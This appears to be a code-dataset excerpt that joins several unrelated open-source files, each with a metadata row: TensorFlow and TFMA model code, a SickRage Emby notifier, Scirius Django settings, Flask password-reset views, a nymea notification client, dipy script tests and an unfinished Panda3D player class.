cov = 'MultivariateNormalFull'
loc_params = params[..., :self.event_size]
scale_params = tf.reshape(
scale_fn(params[..., self.event_size:]),
tf.concat(
[tf.shape(input=params)[:-1], (self.event_size, self.event_size)],
axis=0))
components_dist = tfd.MultivariateNormalFullCovariance(
loc=loc_params,
covariance_matrix=scale_params,
validate_args=self._validate_args)
else:
raise NotImplementedError
# ====== finally the mixture ====== #
d = tfd.MixtureSameFamily(mixture_distribution=mixture_dist,
components_distribution=components_dist,
validate_args=False,
name="Mixture%s" % cov)
# Wraps the distribution to return both dist and concrete value."""
value_is_seq = isinstance(d.dtype, collections.Sequence)
maybe_composite_convert_to_tensor_fn = (
(lambda d: tensor_tuple.TensorTuple(self._convert_to_tensor_fn(d)))
if value_is_seq else self._convert_to_tensor_fn)
distribution = dtc._TensorCoercible( # pylint: disable=protected-access
distribution=d,
convert_to_tensor_fn=maybe_composite_convert_to_tensor_fn)
value = distribution._value() # pylint: disable=protected-access
value._tfp_distribution = distribution # pylint: disable=protected-access
if value_is_seq:
value.shape = value[-1].shape
value.get_shape = value[-1].get_shape
value.dtype = value[-1].dtype
distribution.shape = value[-1].shape
distribution.get_shape = value[-1].get_shape
else:
distribution.shape = value.shape
distribution.get_shape = value.get_shape
if self._enter_dunder_call:
# Its critical to return both distribution and concretization
# so Keras can inject `_keras_history` to both. This is what enables
# either to be used as an input to another Keras `Model`.
return distribution, value
return distribution
def compute_output_shape(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape)
input_shape = input_shape.with_rank_at_least(2)
if tensor_shape.dimension_value(input_shape[-1]) is None:
raise ValueError(
'The innermost dimension of input_shape must be defined, but saw: %s'
% input_shape)
# the number of output units is equal to event_size, not number of
# hidden units
return input_shape[:-1].concatenate(self.event_size)
def get_config(self):
"""Returns the config of this layer. """
config = {
'convert_to_tensor_fn': _serialize(self._convert_to_tensor_fn),
'covariance_type': self._covariance_type,
'validate_args': self._validate_args,
'n_components': self._n_components,
'softplus_scale': self._softplus_scale,
}
base_config = super(MixtureDensityNetwork, self).get_config()
base_config.update(config)
return base_config
| mit | -7,376,699,029,470,903,000 | 39.959184 | 80 | 0.621325 | false |
tensorflow/model-analysis | tensorflow_model_analysis/eval_saved_model/example_trainers/control_dependency_estimator.py | 1 | 6700 | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Exports a simple estimator with control dependencies using tf.Learn.
This is the fixed prediction estimator with extra fields, but it creates
metrics with control dependencies on the features, predictions and labels.
This is for use in tests to verify that TFMA correctly works around the
TensorFlow issue #17568.
This model always predicts the value of the "prediction" feature.
The eval_input_receiver_fn also parses the "fixed_float", "fixed_string",
"fixed_int", and "var_float", "var_string", "var_int" features.
"""
from __future__ import absolute_import
from __future__ import division
# Standard __future__ imports
from __future__ import print_function
# Standard Imports
import tensorflow as tf
from tensorflow_model_analysis.eval_saved_model import export
from tensorflow_model_analysis.eval_saved_model.example_trainers import util
from tensorflow.python.estimator.canned import metric_keys
from tensorflow.python.estimator.canned import prediction_keys
def simple_control_dependency_estimator(export_path, eval_export_path):
"""Exports a simple estimator with control dependencies."""
def control_dependency_metric(increment, target):
"""Metric that introduces a control dependency on target.
The value is incremented by increment each time the metric is called
(so the value can vary depending on how things are batched). This is mainly
to verify that the metric was called.
Args:
increment: Amount to increment the value by each time the metric is
called.
target: Tensor to introduce the control dependency on.
Returns:
value_op, update_op for the metric.
"""
total_value = tf.compat.v1.Variable(
initial_value=0.0,
dtype=tf.float64,
trainable=False,
collections=[
tf.compat.v1.GraphKeys.METRIC_VARIABLES,
tf.compat.v1.GraphKeys.LOCAL_VARIABLES
],
validate_shape=True)
with tf.control_dependencies([target]):
update_op = tf.identity(tf.compat.v1.assign_add(total_value, increment))
value_op = tf.identity(total_value)
return value_op, update_op
def model_fn(features, labels, mode, config):
"""Model function for custom estimator."""
del config
predictions = features['prediction']
predictions_dict = {
prediction_keys.PredictionKeys.PREDICTIONS: predictions,
}
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.estimator.EstimatorSpec(
mode=mode,
predictions=predictions_dict,
export_outputs={
tf.saved_model.DEFAULT_SERVING_SIGNATURE_DEF_KEY:
tf.estimator.export.RegressionOutput(predictions)
})
loss = tf.compat.v1.losses.mean_squared_error(predictions,
labels['actual_label'])
train_op = tf.compat.v1.assign_add(tf.compat.v1.train.get_global_step(), 1)
eval_metric_ops = {}
if mode == tf.estimator.ModeKeys.EVAL:
eval_metric_ops = {
metric_keys.MetricKeys.LOSS_MEAN:
tf.compat.v1.metrics.mean(loss),
'control_dependency_on_fixed_float':
control_dependency_metric(1.0, features['fixed_float']),
# Introduce a direct dependency on the values Tensor. If we
# introduce another intervening op like sparse_tensor_to_dense then
# regardless of whether TFMA correctly wrap SparseTensors we will not
# encounter the TF bug.
'control_dependency_on_var_float':
control_dependency_metric(10.0, features['var_float'].values),
'control_dependency_on_actual_label':
control_dependency_metric(100.0, labels['actual_label']),
'control_dependency_on_var_int_label':
control_dependency_metric(1000.0, labels['var_int'].values),
# Note that TFMA does *not* wrap predictions, so in most cases
# if there's a control dependency on predictions they will be
# recomputed.
'control_dependency_on_prediction':
control_dependency_metric(10000.0, predictions),
}
return tf.estimator.EstimatorSpec(
mode=mode,
loss=loss,
train_op=train_op,
predictions=predictions_dict,
eval_metric_ops=eval_metric_ops)
def train_input_fn():
"""Train input function."""
return {
'prediction': tf.constant([[1.0], [2.0], [3.0], [4.0]]),
}, {
'actual_label': tf.constant([[1.0], [2.0], [3.0], [4.0]])
}
feature_spec = {'prediction': tf.io.FixedLenFeature([1], dtype=tf.float32)}
eval_feature_spec = {
'prediction': tf.io.FixedLenFeature([1], dtype=tf.float32),
'label': tf.io.FixedLenFeature([1], dtype=tf.float32),
'fixed_float': tf.io.FixedLenFeature([1], dtype=tf.float32),
'fixed_string': tf.io.FixedLenFeature([1], dtype=tf.string),
'fixed_int': tf.io.FixedLenFeature([1], dtype=tf.int64),
'var_float': tf.io.VarLenFeature(dtype=tf.float32),
'var_string': tf.io.VarLenFeature(dtype=tf.string),
'var_int': tf.io.VarLenFeature(dtype=tf.int64),
}
estimator = tf.estimator.Estimator(model_fn=model_fn)
estimator.train(input_fn=train_input_fn, steps=1)
def eval_input_receiver_fn():
"""An input_fn that expects a serialized tf.Example."""
serialized_tf_example = tf.compat.v1.placeholder(
dtype=tf.string, shape=[None], name='input_example_tensor')
features = tf.io.parse_example(
serialized=serialized_tf_example, features=eval_feature_spec)
labels = {'actual_label': features['label'], 'var_int': features['var_int']}
return export.EvalInputReceiver(
features=features,
labels=labels,
receiver_tensors={'examples': serialized_tf_example})
return util.export_model_and_eval_model(
estimator=estimator,
serving_input_receiver_fn=(
tf.estimator.export.build_parsing_serving_input_receiver_fn(
feature_spec)),
eval_input_receiver_fn=eval_input_receiver_fn,
export_path=export_path,
eval_export_path=eval_export_path)
| apache-2.0 | -6,121,643,079,959,225,000 | 38.64497 | 80 | 0.673134 | false |
pedro2d10/SickRage-FR | sickbeard/notifiers/emby.py | 1 | 4193 | # coding=utf-8
# Author: Nic Wolfe <[email protected]>
# URL: http://code.google.com/p/sickbeard/
#
# This file is part of SickRage.
#
# SickRage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickRage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickRage. If not, see <http://www.gnu.org/licenses/>.
import urllib
import urllib2
import sickbeard
from sickbeard import logger
from sickrage.helper.exceptions import ex
try:
import json
except ImportError:
import simplejson as json
class Notifier(object):
def _notify_emby(self, message, host=None, emby_apikey=None):
"""Handles notifying Emby host via HTTP API
Returns:
Returns True for no issue or False if there was an error
"""
# fill in omitted parameters
if not host:
host = sickbeard.EMBY_HOST
if not emby_apikey:
emby_apikey = sickbeard.EMBY_APIKEY
url = 'http://%s/emby/Notifications/Admin' % host
values = {'Name': 'SickRage', 'Description': message, 'ImageUrl': 'https://raw.githubusercontent.com/SickRage/SickRage/master/gui/slick/images/sickrage-shark-mascot.png'}
data = json.dumps(values)
try:
req = urllib2.Request(url, data)
req.add_header('X-MediaBrowser-Token', emby_apikey)
req.add_header('Content-Type', 'application/json')
response = urllib2.urlopen(req)
result = response.read()
response.close()
logger.log(u'EMBY: HTTP response: ' + result.replace('\n', ''), logger.DEBUG)
return True
except (urllib2.URLError, IOError) as e:
logger.log(u'EMBY: Warning: Couldn\'t contact Emby at ' + url + ' ' + ex(e), logger.WARNING)
return False
##############################################################################
# Public functions
##############################################################################
def test_notify(self, host, emby_apikey):
return self._notify_emby('This is a test notification from SickRage', host, emby_apikey)
def update_library(self, show=None):
"""Handles updating the Emby Media Server host via HTTP API
Returns:
Returns True for no issue or False if there was an error
"""
if sickbeard.USE_EMBY:
if not sickbeard.EMBY_HOST:
logger.log(u'EMBY: No host specified, check your settings', logger.DEBUG)
return False
if show:
if show.indexer == 1:
provider = 'tvdb'
elif show.indexer == 2:
logger.log(u'EMBY: TVRage Provider no longer valid', logger.WARNING)
return False
else:
logger.log(u'EMBY: Provider unknown', logger.WARNING)
return False
query = '?%sid=%s' % (provider, show.indexerid)
else:
query = ''
url = 'http://%s/emby/Library/Series/Updated%s' % (sickbeard.EMBY_HOST, query)
values = {}
data = urllib.urlencode(values)
try:
req = urllib2.Request(url, data)
req.add_header('X-MediaBrowser-Token', sickbeard.EMBY_APIKEY)
response = urllib2.urlopen(req)
result = response.read()
response.close()
logger.log(u'EMBY: HTTP response: ' + result.replace('\n', ''), logger.DEBUG)
return True
except (urllib2.URLError, IOError) as e:
logger.log(u'EMBY: Warning: Couldn\'t contact Emby at ' + url + ' ' + ex(e), logger.WARNING)
return False
| gpl-3.0 | -1,720,672,605,901,913,900 | 33.652893 | 178 | 0.576198 | false |
CyberTaoFlow/scirius | scirius/settings.py | 1 | 4444 | """
Django settings for scirius project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
from distutils.version import LooseVersion
from django import get_version
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'p8o5%vq))8h2li08c%k3id(wwo*u(^dbdmx2tv#t(tb2pr9@n-'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_tables2',
'bootstrap3',
'rules',
'suricata',
'accounts',
)
if LooseVersion(get_version()) < LooseVersion('1.7'):
INSTALLED_APPS += ('south', )
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'scirius.loginrequired.LoginRequiredMiddleware',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.core.context_processors.request',
'django.contrib.auth.context_processors.auth'
)
ROOT_URLCONF = 'scirius.urls'
WSGI_APPLICATION = 'scirius.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'my_cache_table',
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.PickleSerializer'
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
# Suricata binary
SURICATA_BINARY = "suricata"
# Elastic search
USE_ELASTICSEARCH = True
#ELASTICSEARCH_ADDRESS = "127.0.0.1:9200"
ELASTICSEARCH_ADDRESS = "localhost:9200"
# You can use a star to avoid timestamping expansion for example 'logstash-*'
ELASTICSEARCH_LOGSTASH_INDEX = "logstash-"
# use hourly, daily to indicate the logstash index building recurrence
ELASTICSEARCH_LOGSTASH_TIMESTAMPING = "daily"
# Kibana
USE_KIBANA = False
# Use django as a reverse proxy for kibana request
# This will allow you to use scirius authentication to control
# access to Kibana
KIBANA_PROXY = False
# Kibana URL
KIBANA_URL = "http://localhost:9292"
# Kibana index name
KIBANA_INDEX = "kibana-int"
# Kibana version
KIBANA_VERSION=3
# Number of dashboards to display
KIBANA_DASHBOARDS_COUNT = 20
# Suricata is configured to write stats to EVE
USE_SURICATA_STATS = False
# Logstash is generating metrics on eve events
USE_LOGSTASH_STATS = False
# Influxdb
USE_INFLUXDB = False
INFLUXDB_HOST = "localhost"
INFLUXDB_PORT = 8086
INFLUXDB_USER = "grafana"
INFLUXDB_PASSWORD = "grafana"
INFLUXDB_DATABASE = "scirius"
# Proxy parameters
# Set USE_PROXY to True to use a proxy to fetch ruleset update.
# PROXY_PARAMS contains the proxy parameters.
# If user is set in PROXY_PARAMS then basic authentication will
# be used.
USE_PROXY = False
PROXY_PARAMS = { 'http': "http://proxy:3128", 'https': "http://proxy:3128" }
# For basic authentication you can use
# PROXY_PARAMS = { 'http': "http://user:pass@proxy:3128", 'https': "http://user:pass@proxy:3128" }
GIT_SOURCES_BASE_DIRECTORY = os.path.join(BASE_DIR, 'git-sources/')
# Ruleset generator framework
RULESET_MIDDLEWARE = 'suricata'
LOGIN_URL = '/accounts/login/'
try:
from local_settings import *
except:
pass
if KIBANA_PROXY:
INSTALLED_APPS += ( 'revproxy',)
| gpl-3.0 | -3,509,663,828,025,243,000 | 24.988304 | 98 | 0.726373 | false |
bt3gl/Neat-Problems-in-Python-and-Flask | USEFUL/snippets_and_examples_Flask/example_password_reset/app/auth/views.py | 1 | 4889 | from flask import render_template, redirect, request, url_for, flash
from flask.ext.login import login_user, logout_user, login_required, \
current_user
from . import auth
from .. import db
from ..models import User
from ..email import send_email
from .forms import LoginForm, RegistrationForm, ChangePasswordForm,\
PasswordResetRequestForm, PasswordResetForm
@auth.before_app_request
def before_request():
if current_user.is_authenticated() \
and not current_user.confirmed \
and request.endpoint[:5] != 'auth.':
return redirect(url_for('auth.unconfirmed'))
@auth.route('/unconfirmed')
def unconfirmed():
if current_user.is_anonymous() or current_user.confirmed:
return redirect(url_for('main.index'))
return render_template('auth/unconfirmed.html')
@auth.route('/login', methods=['GET', 'POST'])
def login():
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
if user is not None and user.verify_password(form.password.data):
login_user(user, form.remember_me.data)
return redirect(request.args.get('next') or url_for('main.index'))
flash('Invalid username or password.')
return render_template('auth/login.html', form=form)
@auth.route('/logout')
@login_required
def logout():
logout_user()
flash('You have been logged out.')
return redirect(url_for('main.index'))
@auth.route('/register', methods=['GET', 'POST'])
def register():
form = RegistrationForm()
if form.validate_on_submit():
user = User(email=form.email.data,
username=form.username.data,
password=form.password.data)
db.session.add(user)
db.session.commit()
token = user.generate_confirmation_token()
send_email(user.email, 'Confirm Your Account',
'auth/email/confirm', user=user, token=token)
flash('A confirmation email has been sent to you by email.')
return redirect(url_for('auth.login'))
return render_template('auth/register.html', form=form)
@auth.route('/confirm/<token>')
@login_required
def confirm(token):
if current_user.confirmed:
return redirect(url_for('main.index'))
if current_user.confirm(token):
flash('You have confirmed your account. Thanks!')
else:
flash('The confirmation link is invalid or has expired.')
return redirect(url_for('main.index'))
@auth.route('/confirm')
@login_required
def resend_confirmation():
token = current_user.generate_confirmation_token()
send_email(current_user.email, 'Confirm Your Account',
'auth/email/confirm', user=current_user, token=token)
flash('A new confirmation email has been sent to you by email.')
return redirect(url_for('main.index'))
@auth.route('/change-password', methods=['GET', 'POST'])
@login_required
def change_password():
form = ChangePasswordForm()
if form.validate_on_submit():
if current_user.verify_password(form.old_password.data):
current_user.password = form.password.data
db.session.add(current_user)
flash('Your password has been updated.')
return redirect(url_for('main.index'))
else:
flash('Invalid password.')
return render_template("auth/change_password.html", form=form)
@auth.route('/reset', methods=['GET', 'POST'])
def password_reset_request():
if not current_user.is_anonymous():
return redirect(url_for('main.index'))
form = PasswordResetRequestForm()
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
if user:
token = user.generate_reset_token()
send_email(user.email, 'Reset Your Password',
'auth/email/reset_password',
user=user, token=token,
next=request.args.get('next'))
flash('An email with instructions to reset your password has been '
'sent to you.')
return redirect(url_for('auth.login'))
return render_template('auth/reset_password.html', form=form)
@auth.route('/reset/<token>', methods=['GET', 'POST'])
def password_reset(token):
if not current_user.is_anonymous():
return redirect(url_for('main.index'))
form = PasswordResetForm()
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
if user is None:
return redirect(url_for('main.index'))
if user.reset_password(token, form.password.data):
flash('Your password has been updated.')
return redirect(url_for('auth.login'))
else:
return redirect(url_for('main.index'))
return render_template('auth/reset_password.html', form=form)
| mit | -1,030,766,068,768,395,900 | 35.485075 | 78 | 0.644713 | false |
meahmadi/nsun | server.py | 1 | 2333 | import web
import traceback
import webbrowser
from web.contrib import template
import os
import json
from datetime import datetime
#from ir.idehgostar.modir.assistant.mind import Mind
from ir.ac.iust.me_ahmadi.multiProcessMind.mind import Mind
render = template.render_genshi(['./templates/'])
urls = (
'/(.*)', 'Assistant'
)
class MyApplication(web.application):
def run(self, port=12010, *middleware):
func = self.wsgifunc(*middleware)
return web.httpserver.runsimple(func, ('0.0.0.0', port))
app = MyApplication(urls, globals())
outbuffer = []
history = []
def getMindOutput(action,args):
Assistant.outbuffer.append([action,args])
def flushOutput():
t = []
t = Assistant.outbuffer
Assistant.outbuffer = []
Assistant.history += t
return t
Mind.singleton(getMindOutput)
class Assistant:
outbuffer = []
history = []
def __init__(self):
pass
def GET(self,name):
print "GET "+name
if not name:
return render.index(root="static");
def OPTIONS(self,args):
web.header('Access-Control-Allow-Origin', '*')
web.header('Access-Control-Allow-Credentials', 'true')
web.header('Access-Control-Allow-Headers','Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token')
def POST(self,action):
if not action:
return '';
web.header('Access-Control-Allow-Origin', '*')
web.header('Access-Control-Allow-Credentials', 'true')
web.header('Access-Control-Allow-Headers','Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token')
data = web.data()
data_dict = {}
try:
data_dict = json.loads(data)
except Exception, e:
print "error parsing json:"+ str(e)
pass
if action=="message":
mind = Mind.singleton(getMindOutput)
try:
for line in data_dict["body"].splitlines():
print line
mind.listen(line)
except Exception as e:
print "Error:"+str(e)
results = []
for output in flushOutput():
results.append({'data': output[1],'action':output[0]})
return json.dumps(results)
if action=="update":
results = []
for output in flushOutput():
results.append({'data': output[1],'action':output[0]})
return json.dumps(results)
else:
return "[]"
if __name__ == "__main__":
print "See: localhost:12010 in browser"
webbrowser.get().open('http://localhost:12010/')
app.run(port=12010)
| gpl-2.0 | -8,180,544,014,247,534,000 | 24.086022 | 109 | 0.672953 | false |
guh/guh-cli | nymea/notifications.py | 1 | 3045 | # -*- coding: UTF-8 -*-
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# #
# Copyright (C) 2015 - 2018 Simon Stuerz <[email protected]> #
# #
# This file is part of nymea-cli. #
# #
# nymea-cli is free software: you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation, version 2 of the License. #
# #
# nymea-cli is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with nymea-cli. If not, see <http://www.gnu.org/licenses/>. #
# #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
import sys
import socket
import json
import select
import telnetlib
import nymea
def notification_sniffer(nymeaHost, nymeaPort):
global commandId
commandId = 0
print "Connecting notification handler..."
try:
tn = telnetlib.Telnet(nymeaHost, nymeaPort)
except :
print "ERROR: notification socket could not connect the to nymea-server. \n"
return None
print "...OK \n"
#enable_notification(notificationSocket)
enable_notification(tn.get_socket())
try:
x = None
while (x !=ord('\n') and x != 27):
socket_list = [sys.stdin, tn.get_socket()]
read_sockets, write_sockets, error_sockets = select.select(socket_list , [], [])
for sock in read_sockets:
# notification messages:
if sock == tn.get_socket():
packet = tn.read_until("}\n")
packet = json.loads(packet)
nymea.print_json_format(packet)
elif sock == sys.stdin:
x = sys.stdin.readline()
return None
finally:
tn.close()
print "Notification socket closed."
def enable_notification(notifySocket):
global commandId
params = {}
commandObj = {}
commandObj['id'] = commandId
commandObj['method'] = "JSONRPC.SetNotificationStatus"
params['enabled'] = "true"
commandObj['params'] = params
command = json.dumps(commandObj) + '\n'
commandId = commandId + 1
notifySocket.send(command)
| gpl-2.0 | 2,748,701,511,971,271,000 | 37.544304 | 92 | 0.469951 | false |
maurozucchelli/dipy | dipy/tests/test_scripts.py | 1 | 5495 | # emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
""" Test scripts
If we appear to be running from the development directory, use the scripts in
the top-level folder ``scripts``. Otherwise try and get the scripts from the
path
"""
from __future__ import division, print_function, absolute_import
import sys
import os
import shutil
from os.path import dirname, join as pjoin, isfile, isdir, abspath, realpath
from subprocess import Popen, PIPE
from nose.tools import assert_true, assert_false, assert_equal
import numpy.testing as nt
import nibabel as nib
from nibabel.tmpdirs import InTemporaryDirectory
from dipy.data import get_data
# Need shell to get path to correct executables
USE_SHELL = True
DEBUG_PRINT = os.environ.get('NIPY_DEBUG_PRINT', False)
DATA_PATH = abspath(pjoin(dirname(__file__), 'data'))
def local_script_dir(script_sdir):
# Check for presence of scripts in development directory. ``realpath``
# checks for the situation where the development directory has been linked
# into the path.
below_us_2 = realpath(pjoin(dirname(__file__), '..', '..'))
devel_script_dir = pjoin(below_us_2, script_sdir)
if isfile(pjoin(below_us_2, 'setup.py')) and isdir(devel_script_dir):
return devel_script_dir
return None
LOCAL_SCRIPT_DIR = local_script_dir('bin')
def run_command(cmd, check_code=True):
if not LOCAL_SCRIPT_DIR is None:
# Windows can't run script files without extensions natively so we need
# to run local scripts (no extensions) via the Python interpreter. On
# Unix, we might have the wrong incantation for the Python interpreter
# in the hash bang first line in the source file. So, either way, run
# the script through the Python interpreter
cmd = "%s %s" % (sys.executable, pjoin(LOCAL_SCRIPT_DIR, cmd))
if DEBUG_PRINT:
print("Running command '%s'" % cmd)
proc = Popen(cmd, stdout=PIPE, stderr=PIPE, shell=USE_SHELL)
stdout, stderr = proc.communicate()
if proc.poll() == None:
proc.terminate()
if check_code and proc.returncode != 0:
raise RuntimeError('Command "%s" failed with stdout\n%s\nstderr\n%s\n'
% (cmd, stdout, stderr))
return proc.returncode, stdout, stderr
def test_dipy_peak_extraction():
# test dipy_peak_extraction script
cmd = 'dipy_peak_extraction'
code, stdout, stderr = run_command(cmd, check_code=False)
assert_equal(code, 2)
def test_dipy_fit_tensor():
# test dipy_fit_tensor script
cmd = 'dipy_fit_tensor'
code, stdout, stderr = run_command(cmd, check_code=False)
assert_equal(code, 2)
def test_dipy_sh_estimate():
# test dipy_sh_estimate script
cmd = 'dipy_sh_estimate'
code, stdout, stderr = run_command(cmd, check_code=False)
assert_equal(code, 2)
def assert_image_shape_affine(filename, shape, affine):
assert_true(os.path.isfile(filename))
image = nib.load(filename)
assert_equal(image.shape, shape)
nt.assert_array_almost_equal(image.get_affine(), affine)
def test_dipy_fit_tensor():
with InTemporaryDirectory() as tmp:
dwi, bval, bvec = get_data("small_25")
# Copy data to tmp directory
shutil.copyfile(dwi, "small_25.nii.gz")
shutil.copyfile(bval, "small_25.bval")
shutil.copyfile(bvec, "small_25.bvec")
# Call script
cmd = ["dipy_fit_tensor", "--mask=none", "small_25.nii.gz"]
out = run_command(" ".join(cmd))
assert_equal(out[0], 0)
# Get expected values
img = nib.load("small_25.nii.gz")
affine = img.get_affine()
shape = img.shape[:-1]
# Check expected outputs
assert_image_shape_affine("small_25_fa.nii.gz", shape, affine)
assert_image_shape_affine("small_25_t2di.nii.gz", shape, affine)
assert_image_shape_affine("small_25_dirFA.nii.gz", shape, affine)
assert_image_shape_affine("small_25_ad.nii.gz", shape, affine)
assert_image_shape_affine("small_25_md.nii.gz", shape, affine)
assert_image_shape_affine("small_25_rd.nii.gz", shape, affine)
with InTemporaryDirectory() as tmp:
dwi, bval, bvec = get_data("small_25")
# Copy data to tmp directory
shutil.copyfile(dwi, "small_25.nii.gz")
shutil.copyfile(bval, "small_25.bval")
shutil.copyfile(bvec, "small_25.bvec")
# Call script
cmd = ["dipy_fit_tensor", "--save-tensor", "--mask=none", "small_25.nii.gz"]
out = run_command(" ".join(cmd))
assert_equal(out[0], 0)
# Get expected values
img = nib.load("small_25.nii.gz")
affine = img.get_affine()
shape = img.shape[:-1]
# Check expected outputs
assert_image_shape_affine("small_25_fa.nii.gz", shape, affine)
assert_image_shape_affine("small_25_t2di.nii.gz", shape, affine)
assert_image_shape_affine("small_25_dirFA.nii.gz", shape, affine)
assert_image_shape_affine("small_25_ad.nii.gz", shape, affine)
assert_image_shape_affine("small_25_md.nii.gz", shape, affine)
assert_image_shape_affine("small_25_rd.nii.gz", shape, affine)
# small_25_tensor saves the tensor as a symmetric matrix following
# the nifti standard.
ten_shape = shape + (1, 6)
assert_image_shape_affine("small_25_tensor.nii.gz", ten_shape,
affine)
| bsd-3-clause | -1,704,001,170,354,622,000 | 35.390728 | 84 | 0.648408 | false |
MJ-meo-dmt/Ecliptic | src/player.py | 1 | 10301 | #!/usr/bin/python
# System imports
import sys, math, os
# Panda imports
from panda3d.core import *
from pandac.PandaModules import *
from direct.actor.Actor import Actor
from direct.interval.IntervalGlobal import *
from direct.task import Task
from direct.showbase.DirectObject import DirectObject
from panda3d.core import BitMask32
from panda3d.bullet import *
from direct.showbase.InputStateGlobal import inputState
# Game imports
from devconfig import *
from globals import *
from gui import *
#---------------------------------------------------------------------#
## Main Player Class.
class Player(object):
"""
Player Class:
This class handels all "Players" in game (Actors)
@method addEntity: Use this to add a created entity to the global entity Dict{}
"""
def __init__(self):
pass
# These are players and other entities
def addEntity(self, entityKey, entityObject):
"""
@param entityKey: Pref the name of the entity
@param entityObject: Pref the name of the created entity
"""
# Add entity to the global enity dict{}
ENTITY[entityKey] = entityObject
## MakePlayer Class
# Will move this class under physics.py so that we have some order.
class MakePlayer(DirectObject):
"""
MakePlayer Class:
This class handels the creation of Players.
Players will be stored in the Entity dict.
"""
def __init__(self):
"""
constructor:
@param name: String_name, for the Player - In game.
@param entityName: String_name for the PC - Player in ENTITY /
dict{} for all uses in code.
"""
self.direction = Vec3(0,0,0)
self.angular_direction = Vec3(0,0,0)
self.speed = 1
self.angular_speed = 3
# Setup Player inventory
self.playerDataStorage = [] # May change
## ADD MOUSE LOOK TASK TO TASKMGR
#taskMgr.add(self.look, 'camera')
# Crouch Flag
self.crouching = False
# Mouse look
self.omega = 0.0
# Setup player input
self.accept('space', self.jump)
self.accept('c', self.crouch) # We need to fix the height
self.accept( "escape",sys.exit )
self.accept('arrow_up', self.up )
self.accept('arrow_down', self.down )
self.accept('arrow_left', self.left )
self.accept('arrow_right', self.right)
self.accept("arrow_up-up", self.idle, ["up"])
self.accept("arrow_down-up", self.idle, ["down"])
self.accept("arrow_left-up", self.idle, ["left"])
self.accept("arrow_right-up", self.idle, ["right"])
#inputState.watchWithModifiers('forward', 'w')
#inputState.watchWithModifiers('left', 'a')
#inputState.watchWithModifiers('reverse', 's')
#inputState.watchWithModifiers('right', 'd')
#inputState.watchWithModifiers('turnLeft', 'q')
#inputState.watchWithModifiers('turnRight', 'e')
#inputState.watchWithModifiers('turnRight', 'e')
# Camera Setup for player
# Get the screen size for the camera controller
self.winXhalf = base.win.getXSize()/2
self.winYhalf = base.win.getYSize()/2
## SETUP CHARACTER AND CHARACTER SHAPE
# Setup Shape
# units = meters
# body height : 1.8 meters
# eyes line : 1.8 - 0.11 meters = 1.69 meters
# h is distance between the centers of the 2 spheres
# w is radius of the spheres
# 1.8 = 0.3 + 1.2 + 0.3
# center : 1.8/2 = 0.9
# camera height : 1.69-0.9 = 0.79
h = 1.2
w = 0.3
# Player needs different setup saam as bullet character controller.
# Atm force gets added onto the node making it ballich
shape = BulletCapsuleShape(w, h , ZUp)
node = BulletRigidBodyNode('Box')
node.setMass(1.0)
node.addShape(shape)
self.node = node
node.setAngularDamping(10)
np = GAMEPLAY_NODES['PLAYER'].attachNewNode(node)
np.setPos(0, 0, 1)
self.arm = np.attachNewNode('arm')
